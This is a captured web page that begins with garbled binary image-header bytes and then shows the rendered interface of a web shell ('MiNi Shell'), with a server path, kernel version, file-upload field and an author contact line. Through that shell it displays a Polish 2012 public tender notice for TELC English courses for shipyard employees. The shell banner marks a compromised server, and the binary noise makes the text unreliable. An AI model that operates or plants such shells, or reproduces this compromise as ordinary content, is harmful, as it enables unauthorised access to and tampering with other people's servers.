JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120104/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120104/5026-N-2012.html

<p class="kh_header"><b>Olecko: Postępowanie o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego o wartości nie przekraczającej kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, na usługę szkoleniową pod nazwą Kurs przygotowujący do certyfikatu TELC wraz z egzaminem</b><br>
<b>Numer ogłoszenia: 5026 - 2012; data zamieszczenia: 04.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Olecku , ul. Armii Krajowej 30, 19-400 Olecko, woj. warmińsko-mazurskie, tel. 0-87 520-30-78, faks 0-87 520-27-46.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.olecko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego o wartości nie przekraczającej kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, na usługę szkoleniową pod nazwą Kurs przygotowujący do certyfikatu TELC wraz z egzaminem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie  szkolenia pod nazwą Kurs przygotowujący do certyfikatu TELC wraz z egzaminem pracownikom firmy  Delphia Yachts KOT sp. j. Celem szkolenia jest podniesienie poziomu wiedzy i kwalifikacji osób wymienionych w pkt .1.  Szkoleniem z języka angielskiego  zostanie  objętych 58 pracowników w podziale na cztery grupy:-  na poziomie A1 - jedna grupa 15 osobowa -  na poziomie A2  - dwie grupy 15 i 13 osobowe -  na poziomie B1 English for Business Purposes - Intermediate - jedna grupa 15 osobowa
Liczba godzin szkolenia  - 140 godziny dla każdej grupy;  łącznie 560  godzin. Zajęcia mają odbywać się po godzinach pracy między godziną 15.15 a 17.15  -  w okresie do 31 października 2012: 2 godziny w tygodniu dla każdej z 4 grup, w okresie listopad 2012 - luty 2013: 2 razy po 2 godziny w tygodniu w odniesieniu do każdej z 4 grup. Wstępny harmonogram prowadzenia zajęć, uzgodniony  z firmą Delphia Yachts KOT sp. j. wykonawca dołączy do oferty.  Harmonogram może być aktualizowany przez Zamawiającego na wniosek Delphia Yachts KOT sp. j.  lub na wniosek Wykonawcy, w szczególności pod katem zapewnienia płynności organizacji pracy w Delphia Yachts KOT sp. j.  Zmiana harmonogramu nie będzie wymagała  aneksu do umowy. Zamawiający zastrzega prawo zmiany ilości osób na poszczególnych poziomach zaawansowania. Łącznie zmiana może objąć maksymalnie 20% uczestników projektu. Zmianę dopuszcza się w przypadku zgłoszonej przez uczestnika i/lub trenera rażącej różnicy w poziomie umiejętności uczestnika oraz wymagań obowiązujących w ramach kursu na danym poziomie zaawansowania, jak również w przypadku zmian aktualnej listy uczestników projektu tj. konieczności dołączenia do projektu nowych osób z listy rezerwowej w wyniku rezygnacji obecnych uczestników. Zastosowane metody nauczania muszą uwzględniać indywidualne podejście do każdego z uczestników.  Szkolenie winno być zrealizowane w terminie od podpisania umowy do   28 lutego  2013 r.  
 Program szkolenia ma spełniać wymogi określone  w § 5 Rozporządzenia Ministra Edukacji i Nauki z dnia 03 luty 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych ( Dz. U. 2006 Nr 31, poz. 216).  Wykonawca zapewni organizację egzaminu z języka angielskiego TELC na poziomie A1 i A2 i B1 (English for Business Purposes - Intermediate) zgodnie z procedurą określoną w odrębnych przepisach ustanowionych przez TELC GmbH oraz zapewni wydanie Certyfikatu TELC przez uprawnioną instytucję. Egzaminy winny być przeprowadzone w terminie szkolenia. Opłaty egzaminacyjne jak i ewentualne koszty związane z dojazdem uczestników na egzamin Wykonawca uwzględni w kosztach szkolenia. Zajęcia odbywać się będą w 2 pomieszczeniach  wskazanych i udostępnionych przez Delphia Yachts KOT sp. j,  zlokalizowanych na terenie zakładu i wyposażonych w niezbędne meble. Wykonawca uzgodni  warunki  udostępnienia pomieszczeń  jak również godziny i dni zajęć z zakładem pracy. Wykonawca zapewni  przestrzeganie zasad bezpieczeństwa i higieny pracy obowiązujących przy wykonywaniu zadań wynikających z realizacji zamówienia. Liczba osób wskazanych przez Zamawiającego do realizacji zamówienia może ulec zmianie, w tej sytuacji Wynagrodzenie, które Wykonawca otrzyma za realizację przedmiotu zamówienia będzie stanowiło iloczyn kosztu szkolenia wskazanego w ofercie za jednego uczestnika szkolenia oraz liczby uczestników, którzy ukończą szkolenie. Za uczestnika, który ukończył szkolenie uznaje się osobę, która przystąpi do egzaminów - na zakończenie szkolenia - uprawniających do otrzymania certyfikatu TELC. Każdy uczestnik szkolenia otrzyma program szkolenia,  harmonogram zajęć,  i materiały szkoleniowe (tzn. materiały własne i opracowania wykładowców, podręczniki umożliwiające samodzielną naukę z zakresu tematyki szkolenia,) oraz  materiały piśmienne: notatnik formatu A4 zawierający min. 50 kartek, długopis, itp.), które po zakończeniu szkolenia przejdą w posiadanie absolwentów ww. kursu. Materiały szkoleniowe powinny być przekazane uczestnikom za pokwitowaniem. Wykonawca przekaże Zamawiającemu jeden przykładowy - wydawany uczestnikom - komplet podręczników oraz  materiałów biurowych . Na 5 dni przed realizacją szkolenia  Wykonawca przedłoży Zamawiającemu materiały szkoleniowe(tzn. materiały własne i opracowania wykładowców, podręczniki umożliwiające samodzielną naukę z zakresu tematyki szkolenia,)  celem akceptacji. 
Cena brutto za zrealizowanie szkolenia  winna zostać obliczona na podstawie wszelkich kosztów poniesionych przez Wykonawcę w związku z realizacją zamówienia. Najpóźniej w dniu podpisania umowy Wykonawca przekaże  Zamawiającemu dokumenty potwierdzające, że osoby biorące udział w realizacji zamówienia spełniają wymagania określone przez Zamawiającego w Specyfikacji Istotnych Warunków Zamówienia.  Wykonawca zobowiązany jest do:   
a. Zapewnienia trenerów zaangażowanych w przeprowadzenie szkolenia będącego przedmiotem zamówienia posiadających odpowiednie kwalifikacje i doświadczenie w zakresie prowadzenia szkoleń. Zmiana osób biorących udział w realizacji zamówienia będzie  możliwa wyłącznie w sytuacjach losowych, po złożeniu przez Wykonawcę pisemnego wniosku z uzasadnieniem i dokumentami potwierdzającymi, że osoby mające zastąpić osoby biorące udział w realizacji zamówienia spełniają wymagania określone w Specyfikacji Istotnych Warunków Zamówienia na etapie przeprowadzonego postępowania przetargowego oraz po zaakceptowaniu zmiany przez Zamawiającego. b. wymiany trenera w ciągu 7 dni kalendarzowych od wezwania Zamawiającego w przypadku zgłoszenia przez min. 30% uczestników z danej grupy negatywnych opinii na temat poziomu dydaktycznego i merytorycznego zajęć  lub  niskiego poziomu dydaktycznego i merytorycznego zajęć stwierdzonego podczas kontroli przeprowadzonej przez Zamawiającego na miejscu. c. Informowania uczestników o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki na lata 2007-2013, Działanie 8.1. Rozwój pracowników i przedsiębiorstw w regionie, projekt pn. Inwestujemy w profesjonalizm - szkolenia dla pracowników DELPHIA YACHTS KOT sp. j. d. Oznaczenia miejsc realizacji szkolenia oraz wszelkich materiałów powstających w ramach szkolenia zgodnie z aktualnymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki zatwierdzonymi przez Instytucję Zarządzającą POKL oraz zasadami promocji projektu.
e. Bieżącego informowania Zamawiającego o przypadkach nieobecności na szkoleniu lub rezygnacji osoby zgłoszonej przez Zamawiającego.
f. Przygotowania ankiet do oceny szkolenia. Ankiety wraz z ich analizą należy przekazać  Zamawiającemu po zakończeniu szkolenia.
g. Prowadzenia dokumentacji przebiegu szkolenia stanowiącej:
- dziennik zajęć edukacyjnych, listę obecności, harmonogram zajęć (godziny i tematy zajęć edukacyjnych);
- rejestr zaświadczeń, certyfikatów i  innych dokumentów potwierdzających udział w szkoleniu.
h .Wydania uczestnikom szkolenia:
-  zaświadczeń  z logo EFS  potwierdzających udział w szkoleniu. Wzór zaświadczenia Wykonawca  załączy do oferty.
- Certyfikatów  TELC .
i. Przekazania Zamawiającemu niezwłocznie po zakończeni szkolenia kopii; listy obecności, rejestru wydanych zaświadczeń i certyfikatów.
j. Umożliwienia Zamawiającemu oraz organom nadzoru i kontroli, prawa wglądu do dokumentów związanych z realizacją przedmiotowego szkolenia.
k. Przechowywania wszystkich oryginalnych dokumentów potwierdzających realizację szkolenia w swojej siedzibie, w sposób gwarantujący dostępność, poufność i bezpieczeństwo do 31 grudnia 2020 roku, a w przypadku zmiany miejsca archiwizacji w/w dokumentów, do zgłoszenia tego faktu Zamawiającemu.
l. Zamieszczenia informacji o szkoleniu w internetowej bazie ofert szkoleniowych dostępnej na stronie Internetowej www.inwestycjawkadry.pl i aktualizowanie  w tej bazie informacji o każdym szkoleniu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.58.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony przez Wykonawcę, który w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zorganizował co najmniej 2 szkolenia i  przeszkolił co najmniej 50 osób dorosłych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony przez Wykonawcę, który wykaże,  że  dysponuje lub będzie dysponował  co najmniej 2 zestawami multimedialnymi, w skład których wejdą: rzutnik,  projektor, ekran.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony przez Wykonawcę, który wykaże,  że  dysponuje lub będzie dysponował  co najmniej 4 osobami,  które będą prowadziły szkolenie posiadającymi wykształcenie wyższe  w specjalności zgodnej z prowadzonymi zajęciami,  przygotowanie pedagogiczne oraz  legitymować się będą co najmniej 100 godz. (godz. lekcyjna rozumiana jako 45 min.) prowadzenia językowych szkoleń z jęz. angielskiego dla dorosłych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy -   załącznik nr 1 do siwz.
Formularz cenowy - załącznik nr 2 do siwz.
Harmonogram szkolenia - załącznik nr 9 do siwz.
Projekt zaświadczenia z logo EFS .
Dokument, z którego wynikać będzie umocowanie Wykonawcy do podpisania oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Certyfikat jakości usług - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana warunków wykonywania umowy dotycząca w szczególności liczebności grup szkoleniowych, kadry szkolącej, terminu realizacji szkolenia, harmonogramu usługi  naruszająca postanowienia umowy wymaga natychmiastowego powiadomienia Zamawiającego i uzyskania jego pisemnej zgody,  z zastrzeżeniem, iż zmiana w składzie kadry szkolącej może nastąpić wyłącznie w sytuacjach losowych, których Wykonawca nie mógł przewidzieć. W takim przypadku Wykonawca zapewni osoby na zastępstwo o równorzędnych  lub wyższych kwalifikacjach.
2.W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.olecko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Olecku  ul. Armii Krajowej 30; 19-400 Olecko pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.01.2012 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Olecku  ul. Armii Krajowej 30; 19-400 Olecko pokój nr 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki, Działanie 8.1. Rozwój pracowników i przedsiębiorstw w regionie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com